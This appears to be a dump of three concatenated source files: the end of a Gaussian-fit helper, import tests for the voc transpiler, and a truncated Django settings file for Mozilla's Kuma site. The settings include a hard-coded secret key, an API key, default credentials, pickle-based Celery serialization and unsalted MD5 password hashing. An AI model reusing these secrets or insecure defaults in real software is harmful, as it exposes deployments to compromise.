#print("Lwidth_x: %10.3g Hwidth_x: %10.3g" % (Lwidth_x,Hwidth_x))
if negamp: # can force the guess to be negative
xcen,amplitude,width_x = Xax[np.argmin(data)],Lamplitude,Lwidth_x
elif negamp is None:
if Hstddev < Lstddev: # positive
xcen,amplitude,width_x, = Xax[np.argmax(data)],Hamplitude,Hwidth_x
else: # negative
xcen,amplitude,width_x, = Xax[np.argmin(data)],Lamplitude,Lwidth_x
else: # if negamp==False, make positive
xcen,amplitude,width_x = Xax[np.argmax(data)],Hamplitude,Hwidth_x
if veryverbose:
print("Hstddev: %g Lstddev: %g" % (Hstddev,Lstddev))
print(("negamp: %s amp,width,cen Lower: %g, %g Upper: %g, %g Center: %g" %
(negamp,Lamplitude,Lwidth_x,Hamplitude,Hwidth_x,xcen)))
mylist = [amplitude,xcen,width_x]
if negamp and amplitude > 0 and veryverbose:
print("WARNING: likely fit failure. negamp=True, but amplitude > 0")
if negamp is False and amplitude < 0 and veryverbose:
print("WARNING: likely fit failure. negamp=False, but amplitude < 0")
if np.isnan(width_x) or np.isnan(height) or np.isnan(amplitude):
raise ValueError("something is nan")
if vheight:
mylist = [height] + mylist
return mylist
|
mit
|
rubacalypse/voc
|
tests/structures/test_import.py
|
2
|
13038
|
import os
from ..utils import TranspileTestCase
class ImportTests(TranspileTestCase):
def test_import_java_module_static_method(self):
"You can invoke a static method from a native Java namespace"
self.assertJavaExecution(
"""
from java import lang
props = lang.System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
"""
%s
Done.
""" % os.path.sep)
def test_import_java_class_static_method(self):
"You can invoke a static method from a native Java class"
self.assertJavaExecution(
"""
from java.lang import System
props = System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
"""
%s
Done.
""" % os.path.sep)
def test_import_java_module(self):
"You can import a native Java namespace as a Python module"
self.assertJavaExecution(
"""
from java import lang
buf = lang.StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
"""
Hello, World
Done.
""")
def test_import_java_class(self):
"You can import a native Java class as a Python module"
self.assertJavaExecution(
"""
from java.lang import StringBuilder
buf = StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
"""
Hello, World
Done.
""")
def test_import_stdlib_module(self):
"You can import a Python module implemented in Java (a native stdlib shim)"
self.assertCodeExecution(
"""
import time
time.time()
print("Done.")
""")
def test_import_module(self):
"You can import a Python module implemented in Python"
self.assertCodeExecution(
"""
import example
example.some_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
"""
})
def test_multiple_module_import(self):
"You can import a multiple Python modules implemented in Python"
self.assertCodeExecution(
"""
import example, other
example.some_method()
other.other_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
""",
'other':
"""
print("Now we're in the other module")
def other_method():
print("Now we're calling another module method")
"""
})
def test_full_dotted_path(self):
self.assertCodeExecution(
"""
import example.submodule
example.submodule.some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_module_from_dotted_path(self):
self.assertCodeExecution(
"""
from example import submodule
submodule.some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_symbol_from_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule import some_method
some_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule':
"""
print("Now we're in example.submodule")
def some_method():
print("Now we're calling a submodule method")
"""
})
def test_full_deep_dotted_path(self):
self.assertCodeExecution(
"""
import example.submodule.subsubmodule.another
example.submodule.subsubmodule.another.another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_module_from_deep_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule.subsubmodule import another
another.another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_symbol_from_deep_dotted_path(self):
self.assertCodeExecution(
"""
from example.submodule.subsubmodule.another import another_method
another_method()
print("Done.")
""",
extra_code={
'example.__init__':
"""
print("Initializing the example module")
""",
'example.submodule.__init__':
"""
print("Now we're in example.submodule.__init__")
""",
'example.submodule.other':
"""
print("Now we're in example.submodule.other")
def other_method():
print("Now we're calling a submodule method")
""",
'example.submodule.subsubmodule.__init__':
"""
print("Now we're in example.submodule.subsubmodule.__init__")
""",
'example.submodule.subsubmodule.another':
"""
print("Now we're in example.submodule.subsubmodule.another")
def another_method():
print("Now we're calling a subsubmodule method")
"""
})
def test_symbol_import(self):
self.assertCodeExecution(
"""
from example import some_method
some_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
"""
})
def test_multiple_symbol_import(self):
self.assertCodeExecution(
"""
from example import some_method, other_method
print("Call some method...")
some_method()
print("Call another method...")
other_method()
try:
print("But this will fail...")
third_method()
except NameError:
print("Which it does.")
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("This shouldn't be called")
"""
})
def test_import_star(self):
self.assertCodeExecution(
"""
from example import *
print("Call some method...")
some_method()
print("Call another method...")
other_method()
print("Call a third method...")
third_method()
print("Done.")
""",
extra_code={
'example':
"""
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("Now we're calling a third module method")
"""
}, run_in_function=False)
def test_import_star_with_all(self):
self.assertCodeExecution(
"""
from example import *
print("Call some method...")
some_method()
print("Call another method...")
other_method()
try:
print("But this will fail...")
third_method()
except NameError:
print("Which it does.")
print("Done.")
""",
extra_code={
'example':
"""
__all__ = ['some_method', 'other_method']
print("Now we're in the example module")
def some_method():
print("Now we're calling a module method")
def other_method():
print("Now we're calling another module method")
def third_method():
print("This shouldn't be called")
"""
}, run_in_function=False)
|
bsd-3-clause
|
MenZil/kuma
|
settings.py
|
2
|
35192
|
# Django settings for kuma project.
from collections import namedtuple
import json
import logging
import os
import platform
from django.utils.functional import lazy
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse_lazy
_Language = namedtuple(u'Language', u'english native iso639_1')
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ROOT = os.path.dirname(os.path.abspath(__file__))
path = lambda *a: os.path.join(ROOT, *a)
ROOT_PACKAGE = os.path.basename(ROOT)
ADMINS = (
('MDN devs', 'mdn-dev@mozilla.com'),
)
PROTOCOL = 'https://'
DOMAIN = 'developer.mozilla.org'
SITE_URL = PROTOCOL + DOMAIN
PRODUCTION_URL = SITE_URL
STAGING_URL = PROTOCOL + 'developer.allizom.org'
USE_X_FORWARDED_HOST = True
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'kuma', # Or path to database file if using sqlite3.
'USER': 'kuma', # Not used with sqlite3.
'PASSWORD': 'kuma', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
'OPTIONS': {
'sql_mode': 'TRADITIONAL',
'charset': 'utf8',
'init_command': 'SET '
'storage_engine=INNODB,'
'character_set_connection=utf8,'
'collation_connection=utf8_general_ci',
},
'ATOMIC_REQUESTS': True,
'TEST': {
'CHARSET': 'utf8',
'COLLATION': 'utf8_general_ci',
},
},
}
# Cache Settings
CACHE_PREFIX = 'kuma'
CACHE_COUNT_TIMEOUT = 60 # in seconds
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'TIMEOUT': CACHE_COUNT_TIMEOUT,
'KEY_PREFIX': CACHE_PREFIX,
},
'memcache': {
'BACKEND': 'memcached_hashring.backend.MemcachedHashRingCache',
'TIMEOUT': CACHE_COUNT_TIMEOUT * 60,
'KEY_PREFIX': CACHE_PREFIX,
'LOCATION': ['127.0.0.1:11211'],
},
}
CACHEBACK_CACHE_ALIAS = 'memcache'
# Addresses email comes from
DEFAULT_FROM_EMAIL = 'notifications@developer.mozilla.org'
SERVER_EMAIL = 'server-error@developer.mozilla.org'
PLATFORM_NAME = platform.node()
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'US/Pacific'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-US'
# Accepted locales
MDN_LANGUAGES = (
'en-US',
'af',
'ar',
'az',
'bm',
'bn-BD',
'bn-IN',
'cs',
'ca',
'de',
'ee',
'el',
'es',
'fa',
'ff',
'fi',
'fr',
'fy-NL',
'ga-IE',
'ha',
'he',
'hi-IN',
'hr',
'hu',
'id',
'ig',
'it',
'ja',
'ka',
'ko',
'ln',
'ml',
'ms',
'my',
'nl',
'pl',
'pt-BR',
'pt-PT',
'ro',
'ru',
'son',
'sq',
'sw',
'ta',
'th',
'tl',
'tr',
'vi',
'wo',
'xh',
'yo',
'zh-CN',
'zh-TW',
'zu',
)
RTL_LANGUAGES = (
'ar',
'fa',
'fa-IR',
'he'
)
DEV_POOTLE_PRODUCT_DETAILS_MAP = {
'pt': 'pt-PT',
'fy': 'fy-NL',
'xx-testing': 'x-testing',
}
# Override generic locale handling with explicit mappings.
# Keys are the requested locale; values are the delivered locale.
LOCALE_ALIASES = {
# Treat "English (United States)" as the canonical "English".
'en': 'en-US',
# Create aliases for over-specific locales.
'bn': 'bn-BD',
'fy': 'fy-NL',
'ga': 'ga-IE',
'gu': 'gu-IN',
'hi': 'hi-IN',
'hy': 'hy-AM',
'pa': 'pa-IN',
'sv': 'sv-SE',
'ta': 'ta-LK',
# Map a prefix to one of its multiple specific locales.
'pt': 'pt-PT',
'sr': 'sr-Cyrl',
'zh': 'zh-CN',
# Create aliases for locales which do not share a prefix.
'nb-NO': 'no',
'nn-NO': 'no',
# Create aliases for locales which use region subtags to assume scripts.
'zh-Hans': 'zh-CN',
'zh-Hant': 'zh-TW',
}
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in MDN_LANGUAGES])
for requested_lang, delivered_lang in LOCALE_ALIASES.items():
if delivered_lang in MDN_LANGUAGES:
LANGUAGE_URL_MAP[requested_lang.lower()] = delivered_lang
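# Illustrative helper (hypothetical name, not used anywhere in Kuma): shows how
# the alias table above resolves a requested locale to a supported one.
def _example_resolve_locale(requested):
    # e.g. 'zh-Hant' -> 'zh-TW', 'en' -> 'en-US'; unsupported locales -> None.
    return LANGUAGE_URL_MAP.get(requested.lower())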
def get_locales():
locales = {}
    locale_file = os.path.join(ROOT, 'kuma', 'languages.json')
    with open(locale_file, 'r') as f:
        json_locales = json.load(f)
for locale, meta in json_locales.items():
locales[locale] = _Language(meta['English'],
meta['native'],
locale)
return locales
LOCALES = get_locales()
LANGUAGES = sorted(tuple([(i, LOCALES[i].native) for i in MDN_LANGUAGES]),
key=lambda lang: lang[0])
# List of MindTouch locales mapped to Kuma locales.
#
# Language in MindTouch pages are first determined from the locale in the page
# title, with a fallback to the language in the page record.
#
# So, first MindTouch locales were inventoried like so:
#
# mysql --skip-column-names -uroot wikidb -B \
# -e 'select page_title from pages where page_namespace=0' \
# > page-titles.txt
#
# grep '/' page-titles.txt | cut -d'/' -f1 | sort -f | uniq -ci | sort -rn
#
# Then, the database languages were inventoried like so:
#
# select page_language, count(page_id) as ct
# from pages group by page_language order by ct desc;
#
# Also worth noting, these are locales configured in the prod Control Panel:
#
# en,ar,ca,cs,de,el,es,fa,fi,fr,he,hr,hu,it,ja,
# ka,ko,nl,pl,pt,ro,ru,th,tr,uk,vi,zh-cn,zh-tw
#
# The Kuma side was picked from elements of the MDN_LANGUAGES list in
# settings.py, and a few were added to match MindTouch locales.
#
# Most of these end up being direct mappings, but it's instructive to go
# through the mapping exercise.
MT_TO_KUMA_LOCALE_MAP = {
"en": "en-US",
"ja": "ja",
"pl": "pl",
"fr": "fr",
"es": "es",
"": "en-US",
"cn": "zh-CN",
"zh_cn": "zh-CN",
"zh-cn": "zh-CN",
"zh_tw": "zh-TW",
"zh-tw": "zh-TW",
"ko": "ko",
"pt": "pt-PT",
"de": "de",
"it": "it",
"ca": "ca",
"cs": "cs",
"ru": "ru",
"nl": "nl",
"hu": "hu",
"he": "he",
"el": "el",
"fi": "fi",
"tr": "tr",
"vi": "vi",
"ro": "ro",
"ar": "ar",
"th": "th",
"fa": "fa",
"ka": "ka",
}
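# For example (hypothetical page title): a MindTouch page titled 'cn/Canvas',
# or one whose page_language column is 'cn', ends up in the Kuma locale
# 'zh-CN' via the table above, and pages with no locale fall back to 'en-US'.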
TEXT_DOMAIN = 'messages'
SITE_ID = 1
PROD_DETAILS_DIR = path('../product_details_json')
MDC_PAGES_DIR = path('../mdc_pages')
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
USE_L10N = True
LOCALE_PATHS = (
path('locale'),
)
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = path('media')
# Absolute path to the directory for the humans.txt file.
HUMANSTXT_ROOT = MEDIA_ROOT
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
STATIC_ROOT = path('static')
SERVE_MEDIA = False
# Paths that don't require a locale prefix.
LANGUAGE_URL_IGNORED_PATHS = (
'media',
'admin',
'robots.txt',
'contribute.json',
'services',
'static',
'1',
'files',
'@api',
'__debug__',
'.well-known',
'users/persona/',
'users/github/login/callback/',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '#%tc(zja8j01!r#h_y)=hy!^k)9az74k+-ib&ij&+**s3-e^_z'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'jingo.Loader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
JINGO_EXCLUDE_APPS = (
'admin',
'waffle',
'registration',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django.core.context_processors.csrf',
'django.contrib.messages.context_processors.messages',
'allauth.account.context_processors.account',
'allauth.socialaccount.context_processors.socialaccount',
'kuma.core.context_processors.global_settings',
'kuma.core.context_processors.i18n',
'kuma.core.context_processors.next_url',
'jingo_minify.helpers.build_ids',
'constance.context_processors.config',
)
MIDDLEWARE_CLASSES = (
# LocaleURLMiddleware must be before any middleware that uses
# kuma.core.urlresolvers.reverse() to add locale prefixes to URLs:
'kuma.core.middleware.LocaleURLMiddleware',
'kuma.core.middleware.SetRemoteAddrFromForwardedFor',
'kuma.wiki.middleware.DocumentZoneMiddleware',
'kuma.wiki.middleware.ReadOnlyMiddleware',
'kuma.core.middleware.Forbidden403Middleware',
'django.middleware.common.CommonMiddleware',
'kuma.core.middleware.RemoveSlashMiddleware',
'commonware.middleware.NoVarySessionMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'kuma.core.anonymous.AnonymousIdentityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'kuma.users.middleware.BanMiddleware',
'waffle.middleware.WaffleMiddleware',
)
# Auth
AUTHENTICATION_BACKENDS = (
'allauth.account.auth_backends.AuthenticationBackend',
)
AUTH_USER_MODEL = 'users.User'
PASSWORD_HASHERS = (
'kuma.users.backends.Sha256Hasher',
'django.contrib.auth.hashers.SHA1PasswordHasher',
'django.contrib.auth.hashers.MD5PasswordHasher',
'django.contrib.auth.hashers.UnsaltedMD5PasswordHasher',
)
USER_AVATAR_PATH = 'uploads/avatars/'
DEFAULT_AVATAR = MEDIA_URL + 'img/avatar.png'
AVATAR_SIZES = [ # in pixels
34, # wiki document page
48, # profile_link helper
200, # profile pages
220, # default, e.g. used in feeds
]
ACCOUNT_ACTIVATION_DAYS = 30
MAX_AVATAR_FILE_SIZE = 131072  # 128 KiB, in bytes
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates"
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
path('templates'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.FileSystemFinder',
)
# TODO: Figure out why changing the order of apps (for example, moving taggit
# higher in the list) breaks tests.
INSTALLED_APPS = (
# django
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'flat',
'django.contrib.admin',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
# MDN
'kuma.core',
'kuma.feeder',
'kuma.landing',
'kuma.search',
'kuma.users',
'kuma.wiki',
'kuma.attachments',
'allauth',
'allauth.account',
'allauth.socialaccount',
'kuma.users.providers.persona',
'kuma.users.providers.github',
# DEMOS
'kuma.demos',
'kuma.contentflagging',
'kuma.actioncounters',
# util
'jingo_minify',
'product_details',
'tower',
'smuggler',
'constance.backends.database',
'constance',
'waffle',
'soapbox',
'kuma.authkeys',
'tidings',
'djcelery',
'taggit',
'dbgettext',
'honeypot',
'cacheback',
'kuma.dashboards',
'statici18n',
'rest_framework',
# testing.
'django_nose',
# other
'kuma.humans',
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
'--traverse-namespace', # make sure `./manage.py test kuma` works
]
# Feed fetcher config
FEEDER_TIMEOUT = 6 # in seconds
def JINJA_CONFIG():
import jinja2
from django.conf import settings
from django.core.cache.backends.memcached import MemcachedCache
from django.core.cache import caches
cache = caches['memcache']
config = {'extensions': ['jinja2.ext.i18n', 'tower.template.i18n',
'jinja2.ext.with_', 'jinja2.ext.loopcontrols',
'jinja2.ext.autoescape'],
'finalize': lambda x: x if x is not None else ''}
if isinstance(cache, MemcachedCache) and not settings.DEBUG:
# We're passing the _cache object directly to jinja because
# Django can't store binary directly; it enforces unicode on it.
# Details: http://jinja.pocoo.org/2/documentation/api#bytecode-cache
# and in the errors you get when you try it the other way.
bc = jinja2.MemcachedBytecodeCache(cache._cache,
"%s:j2:" % settings.CACHE_PREFIX)
config['cache_size'] = -1 # Never clear the cache
config['bytecode_cache'] = bc
return config
# Let Tower know about our additional keywords.
# DO NOT import an ngettext variant as _lazy.
TOWER_KEYWORDS = {
'_lazy': None,
}
# Tells the extract script what files to look for l10n in and what function
# handles the extraction. The Tower library expects this.
DOMAIN_METHODS = {
'messages': [
('vendor/**', 'ignore'),
('kuma/dashboards/**', 'ignore'),
('kuma/core/**', 'ignore'),
('kuma/**.py',
'tower.management.commands.extract.extract_tower_python'),
('**/templates/**.html',
'tower.management.commands.extract.extract_tower_template'),
('**/templates/**.ltxt',
'tower.management.commands.extract.extract_tower_template'),
],
'javascript': [
# We can't say **.js because that would dive into any libraries.
('media/js/libs/ckeditor/plugins/mdn-link/**.js', 'javascript')
],
}
# These domains will not be merged into messages.pot and will use separate PO
# files. See the following URL for an example of how to set these domains
# in DOMAIN_METHODS.
# http://github.com/jbalogh/zamboni/blob/d4c64239c24aa2f1e91276909823d1d1b290f0ee/settings.py#L254
STANDALONE_DOMAINS = [
'javascript',
]
# If you have trouble extracting strings with Tower, try setting this
# to True
TOWER_ADD_HEADERS = True
# Bundles for JS/CSS Minification
JINGO_MINIFY_USE_STATIC = False
CLEANCSS_BIN = '/usr/local/bin/cleancss'
UGLIFY_BIN = '/usr/bin/uglifyjs'
MINIFY_BUNDLES = {
'css': {
'mdn': (
'css/font-awesome.css',
'css/main.css',
),
'jquery-ui': (
'js/libs/jquery-ui-1.10.3.custom/css/ui-lightness/jquery-ui-1.10.3.custom.min.css',
'css/jqueryui/moz-jquery-plugins.css',
'css/jquery-ui-customizations.css',
),
'demostudio': (
'css/demos.css',
),
'devderby': (
'css/devderby.css',
),
'gaia': (
'css/gaia.css',
),
'home': (
'css/home.css',
'js/libs/owl.carousel/owl-carousel/owl.carousel.css',
'js/libs/owl.carousel/owl-carousel/owl.theme.css',
),
'search': (
'css/search.css',
),
'search-suggestions': (
'css/search-suggestions.css',
),
'wiki': (
'css/wiki.css',
'css/zones.css',
'css/diff.css',
'js/libs/prism/themes/prism.css',
'js/libs/prism/plugins/line-highlight/prism-line-highlight.css',
'js/libs/prism/plugins/ie8/prism-ie8.css',
'js/prism-mdn/plugins/line-numbering/prism-line-numbering.css',
'js/prism-mdn/components/prism-json.css',
'css/wiki-syntax.css',
),
'wiki-revisions': (
'css/wiki-revisions.css',
),
'wiki-edit': (
'css/wiki-edit.css',
),
'sphinx': (
'css/wiki.css',
'css/sphinx.css',
),
'users': (
'css/users.css',
),
'tagit': (
'css/libs/jquery.tagit.css',
),
'promote': (
'css/promote.css',
),
'error': (
'css/error.css',
),
'error-404': (
'css/error.css',
'css/error-404.css',
),
'calendar': (
'css/calendar.css',
),
'profile': (
'css/profile.css',
),
'dashboards': (
'css/dashboards.css',
'css/diff.css',
),
'newsletter': (
'css/newsletter.css',
),
'submission': (
'css/submission.css',
),
'user-banned': (
'css/user-banned.css',
),
'error-403-alternate': (
'css/error-403-alternate.css',
),
'fellowship': (
'css/fellowship.css',
),
'mdn10': (
'css/mdn10.css',
),
},
'js': {
'main': (
'js/libs/jquery-2.1.0.js',
'js/components.js',
'js/analytics.js',
'js/main.js',
'js/auth.js',
'js/fonts.js',
),
'home': (
'js/libs/owl.carousel/owl-carousel/owl.carousel.js',
'js/home.js'
),
'popup': (
'js/libs/jquery-ui-1.10.3.custom/js/jquery-ui-1.10.3.custom.min.js',
'js/modal-control.js',
),
'profile': (
'js/profile.js',
'js/moz-jquery-plugins.js',
),
'social': (
'js/social.js',
),
'helpfulness': (
'js/helpfulness.js',
),
'demostudio': (
'js/libs/jquery.hoverIntent.minified.js',
'js/libs/jquery.scrollTo-1.4.2-min.js',
'js/demos.js',
'js/libs/jquery-ui-1.10.3.custom/js/jquery-ui-1.10.3.custom.min.js',
'js/modal-control.js',
),
'demostudio_devderby_landing': (
'js/demos-devderby-landing.js',
),
'jquery-ui': (
'js/libs/jquery-ui-1.10.3.custom/js/jquery-ui-1.10.3.custom.min.js',
'js/moz-jquery-plugins.js',
),
'libs/tagit': (
'js/libs/tag-it.js',
),
'search': (
'js/search.js',
'js/search-navigator.js',
),
'framebuster': (
'js/framebuster.js',
),
'syntax-prism': (
'js/libs/prism/prism.js',
'js/prism-mdn/components/prism-json.js',
'js/prism-mdn/plugins/line-numbering/prism-line-numbering.js',
'js/libs/prism/plugins/line-highlight/prism-line-highlight.js',
'js/syntax-prism.js',
),
'search-suggestions': (
'js/search-suggestions.js',
),
'wiki': (
'js/search-navigator.js',
'js/wiki.js',
'js/wiki-samples.js',
),
'wiki-edit': (
'js/wiki-edit.js',
'js/libs/tag-it.js',
'js/wiki-tags-edit.js',
),
'wiki-move': (
'js/wiki-move.js',
),
'newsletter': (
'js/newsletter.js',
),
'fellowship': (
'js/fellowship.js',
),
'fontfaceobserver': (
'js/libs/fontfaceobserver/fontfaceobserver-standalone.js',
),
},
}
#
# Session cookies
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
# Cookie prefix from PHPBB settings.
PHPBB_COOKIE_PREFIX = 'phpbb3_jzxvr'
# Maximum length of the filename. Forms should use this and raise
# ValidationError if the length is exceeded.
# @see http://code.djangoproject.com/ticket/9893
# Columns are 250 but this leaves 50 chars for the upload_to prefix
MAX_FILENAME_LENGTH = 200
MAX_FILEPATH_LENGTH = 250
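# Illustrative sketch (hypothetical form, kept as a comment on purpose) of how
# a form might enforce the filename limit described above:
#   def clean_file(self):
#       uploaded = self.cleaned_data['file']
#       if len(uploaded.name) > MAX_FILENAME_LENGTH:
#           raise forms.ValidationError('File name is too long.')
#       return uploaded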
ATTACHMENT_HOST = 'mdn.mozillademos.org'
# Video settings, hard coded here for now.
# TODO: figure out a way that doesn't need these values
WIKI_VIDEO_WIDTH = 640
WIKI_VIDEO_HEIGHT = 480
IMAGE_MAX_FILESIZE = 1048576 # 1 megabyte, in bytes
THUMBNAIL_SIZE = 120 # Thumbnail size, in pixels
THUMBNAIL_UPLOAD_PATH = 'uploads/images/thumbnails/'
IMAGE_UPLOAD_PATH = 'uploads/images/'
# A string listing image mime types to accept, comma separated.
# String must not contain double quotes!
IMAGE_ALLOWED_MIMETYPES = 'image/jpeg,image/png,image/gif'
# Email
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = '/tmp/kuma-messages'
# Celery
import djcelery
djcelery.setup_loader()
BROKER_URL = 'amqp://kuma:kuma@developer-local:5672/kuma'
CELERY_ALWAYS_EAGER = True # For tests. Set to False for use.
CELERY_SEND_TASK_ERROR_EMAILS = True
CELERY_SEND_EVENTS = True
CELERY_SEND_TASK_SENT_EVENT = True
CELERY_TRACK_STARTED = True
CELERYD_LOG_LEVEL = logging.INFO
CELERYD_CONCURRENCY = 4
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
CELERY_ACCEPT_CONTENT = ['pickle']
CELERY_IMPORTS = (
'tidings.events',
)
CELERY_ANNOTATIONS = {
'cacheback.tasks.refresh_cache': {
'rate_limit': '120/m',
},
}
# Wiki rebuild settings
WIKI_REBUILD_TOKEN = 'kuma:wiki:full-rebuild'
WIKI_REBUILD_ON_DEMAND = False
# Anonymous user cookie
ANONYMOUS_COOKIE_NAME = 'KUMA_ANONID'
ANONYMOUS_COOKIE_MAX_AGE = 30 * 86400 # Seconds
# Top contributors cache settings
TOP_CONTRIBUTORS_CACHE_KEY = 'kuma:TopContributors'
TOP_CONTRIBUTORS_CACHE_TIMEOUT = 60 * 60 * 12
# Do not change this without also deleting all wiki documents:
WIKI_DEFAULT_LANGUAGE = LANGUAGE_CODE
TIDINGS_FROM_ADDRESS = 'notifications@developer.mozilla.org'
TIDINGS_CONFIRM_ANONYMOUS_WATCHES = True
# content flagging
DEMO_FLAG_REASONS = (
('notworking', _('This demo is not working for me')),
('inappropriate', _('This demo contains inappropriate content')),
('plagarised', _('This demo was not created by the author')),
)
WIKI_FLAG_REASONS = (
('bad', _('This article is spam/inappropriate')),
('unneeded', _('This article is obsolete/unneeded')),
('duplicate', _('This is a duplicate of another article')),
)
FLAG_REASONS = DEMO_FLAG_REASONS + WIKI_FLAG_REASONS
# bit.ly
BITLY_API_KEY = "SET ME IN SETTINGS_LOCAL"
BITLY_USERNAME = "SET ME IN SETTINGS_LOCAL"
GOOGLE_MAPS_API_KEY = "ABQIAAAAijZqBZcz-rowoXZC1tt9iRT5rHVQFKUGOHoyfP_4KyrflbHKcRTt9kQJVST5oKMRj8vKTQS2b7oNjQ"
# demo studio uploads
# Filesystem path where files uploaded for demos will be written
DEMO_UPLOADS_ROOT = path('media/uploads/demos')
# Base URL from where files uploaded for demos will be linked and served
DEMO_UPLOADS_URL = '/media/uploads/demos/'
CONSTANCE_BACKEND = 'constance.backends.database.DatabaseBackend'
# must be an entry in the CACHES setting!
CONSTANCE_DATABASE_CACHE_BACKEND = 'memcache'
# Settings and defaults controllable by Constance in admin
CONSTANCE_CONFIG = dict(
DEMO_BLACKLIST_OVERRIDE_EXTENSIONS=(
'jsgz datagz memgz',
'File extensions that override the mimetype blacklist in case of '
        'an ambiguous mimetype such as application/gzip',
),
DEMO_MAX_ZIP_FILESIZE=(
60 * 1024 * 1024,
"Max file size for zips uploaded to demo studio."
),
DEMO_MAX_FILESIZE_IN_ZIP=(
60 * 1024 * 1024,
"Max file size for files inside zip uploaded to demo studio."
),
DEMOS_DEVDERBY_CURRENT_CHALLENGE_TAG=(
"challenge:2011:september",
"Dev derby current challenge"
),
DEMOS_DEVDERBY_PREVIOUS_WINNER_TAG=(
"system:challenge:firstplace:2011:august",
"Tag used to find most recent winner for dev derby"
),
DEMOS_DEVDERBY_CHALLENGE_CHOICE_TAGS=(
' '.join([
"challenge:2011:september",
"challenge:2011:october",
"challenge:2011:november",
]),
"Dev derby choices displayed on submission form (space-separated tags)"
),
DEMOS_DEVDERBY_PREVIOUS_CHALLENGE_TAGS=(
' '.join([
"challenge:2013:june",
"challenge:2013:may",
"challenge:2013:april",
"challenge:2013:march",
